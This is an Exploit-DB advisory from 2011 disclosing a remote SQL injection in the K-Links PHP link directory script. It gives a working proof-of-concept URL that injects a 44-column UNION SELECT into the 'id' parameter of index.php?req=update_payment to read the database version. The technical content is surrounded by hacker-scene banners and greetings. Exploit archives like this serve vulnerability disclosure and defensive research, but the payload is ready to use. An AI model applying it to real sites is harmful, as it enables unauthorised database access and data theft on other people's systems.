K-Links - Link Directory Script SQL Injection Vulnerability

2011-04-11T00:00:00
ID EDB-ID:17146
Type exploitdb
Reporter R3d-D3V!L
Modified 2011-04-11T00:00:00

Description

K-Links - Link Directory Script SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
[~] Tybe: REMOTE SQL iNJECTioN  
[~] Vendor: http://turn-k.net 
[+] Software: K-Links
[+] author: ((R3d-D3v!L))  
[~]  
[+] TEAM: N0W... !AM W0RK!NG AL0NE
[~]  
[?] contact: X[at]hotmail.co.jp  
[-]  
[?] Date: ll.4Pr.2oll   
[?] T!ME: 05:15 am GMT   
[?] Home: .........
[^]    

[?] 
======================================================================================  
#suFFEr Fr0M REMOTE SQL iNJECTioN Vulnerabilities  
======================================================================================  
  
[*] Err0r C0N50L3: 
  
  
http://www.site.com/index.php?req=update_payment&id= EV!L INJECT!ON 
  
  
  
[*] prove of concept =  
  
  http://www.site.com/index.php?req=update_payment&id=-4410+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
 
  
  
Already Tested on Win Xp 
  
[~]-----------------------------{((BLACk-hAT))}------------------------------------------------ 
# ;
# ;
[~] Greetz tO: .................................................................... no one deserved ;
#  
[~]70 ALL ARAB!AN HACKER 3X3PT : .......................................LAM3RZ #  ;
#  
[~] spechial thanks :...................................... no one deserved  # ; 
#  
[?]spechial SupP0RT : ................MY M!ND # �  ;
#  
[?]---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #;  
#  
[~]spechial FR!ND:  ........................................no one deserved #;  
#  
[~] !'M 4R48!4N 3XPL0!73R. #;  
#  
[~](>D!R 4ll 0R D!E<) #;  
#  
[~]---------------------------------------------------------------------------------------------